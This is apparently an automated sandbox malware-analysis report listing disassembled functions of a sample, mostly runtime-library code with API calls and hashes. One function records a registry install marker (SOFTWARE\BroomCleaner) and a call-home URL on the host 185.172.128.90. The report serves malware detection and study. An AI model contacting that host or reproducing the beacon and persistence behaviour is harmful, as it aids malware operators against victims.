                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: {wB
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                                                                        • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                                                                        • Instruction ID: 3d2ee20963665f170610e7b1928b6ee6a0b7937fae5d014eb50203bebe420f0e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8111E372B202259BDB15EBA4CC44AFE7BF4EF84714F14851AE811B72D1DB74B900C794
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0420385C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 04203861
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04203870
                                                                                                                                                                                                                                                                                        • int.LIBCPMT ref: 04203887
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::_Lockit.LIBCPMT ref: 04201590
                                                                                                                                                                                                                                                                                          • Part of subcall function 0420157F: std::_Lockit::~_Lockit.LIBCPMT ref: 042015AA
                                                                                                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 04203890
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 042038C1
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 042038D7
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 042038FD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                        • String ID: {wB
                                                                                                                                                                                                                                                                                        • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                                                                        • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                                                                        • Instruction ID: 639297f97290ab16592bd37235d16889ca33d5b721be18d93226a64583d8fa26
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0811CA72F201299BDB15EBA4C844AEDBBF4EF84714F14855AE811B72D1DB74B904C790
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04219514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                                                                        • Instruction ID: a6e1ebd58eac4235222430e473842432a6251fd56fa41b8ac70f4d4f05845bbe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEC1C5F4F2424AAFDB15DFA8C8A0BADBBF4AF29314F054094E441B73A1C771A581CB65
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                                                                        • Opcode ID: c3e445ed7001fce5782e6ff796f873a1f47f75c38b30a802e11a732cb368c7e6
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e445ed7001fce5782e6ff796f873a1f47f75c38b30a802e11a732cb368c7e6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04214CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: GetLastError.KERNEL32(?,?,0420E697,?,?,?,0420ED94,?), ref: 04216F84
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _free.LIBCMT ref: 04216FB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: SetLastError.KERNEL32(00000000), ref: 04216FF8
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216F80: _abort.LIBCMT ref: 04216FFE
                                                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 04214F5B
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04214FCC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04214FE5
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215017
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215020
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421502C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                                                                        • Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                                                                        • Instruction ID: c59ab5f222490e7bda98a1f1e9e6328c14a2d7bca9cc79bad981f986383644f2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B10775A1121A9FDB24EF18C884AADB7F4FB58304F5045AAE94DA7360E771BE90CF40
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                                                                        • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041EF07 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 231c2a6dbb4a733bfdca2a45ab7275dab257816d97da2a85fd971ee4d547d3bb
                                                                                                                                                                                                                                                                                        • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 231c2a6dbb4a733bfdca2a45ab7275dab257816d97da2a85fd971ee4d547d3bb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0421F16E Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                                                                        • Instruction ID: d99150221146ad311adce6574623f1486cf6a46c54eef08db8b6b0b68b2392e6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C61F671F20205AFEB20DFA4C841B9EBBF5EF64310F15416AD955EB260EB70B941CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                                                                        • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04215C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,042163EF,?,?,?,?,?,?), ref: 04215CBC
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 04215D37
                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 04215D52
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 04215D78
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,042163EF,00000000,?,?,?,?,?,?,?,?,?,042163EF,?), ref: 04215D97
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,042163EF,00000000,?,?,?,?,?,?,?,?,?,042163EF,?), ref: 04215DD0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                                                                        • Instruction ID: 878c693da04125292b90371bbbb9a0a0f1d1f7433cde769a170255b5f33a66b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C51F670F10209AFDB14CFA8D884AEEBBF8EF58300F14409AE541E72A1D770A591CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040C7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04201417 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0420141C
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0420142E
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0420146B
                                                                                                                                                                                                                                                                                          • Part of subcall function 042080E1: _Yarn.LIBCPMT ref: 04208100
                                                                                                                                                                                                                                                                                          • Part of subcall function 042080E1: _Yarn.LIBCPMT ref: 04208124
                                                                                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0420148C
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0420149A
                                                                                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 042014BD
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0420152E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 835844855-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                                                                        • Instruction ID: 1616b86b95b3ca1f4f62548ef17d5666760e09c08fbea99dde62d93f81380340
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79319E72A10B009FC732AF29D84066AFBF4FF58714B20CA2FE08A83A91D775B541CB55
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 04226396 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0422639B
                                                                                                                                                                                                                                                                                        • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 042263C3
                                                                                                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 04226446
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 04226467
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                                                                        • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                                                                        • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                                                                        • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                                                                        • Instruction ID: d8743eaeb1af12ce41d7275ce4303f7f11f31c2bc70edb252c2effb0c853ef07
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10318B72A10129EFDB148FA8CC949FEBB79FB48218F04416EE402B3191C7716D05CB60
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004228D8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
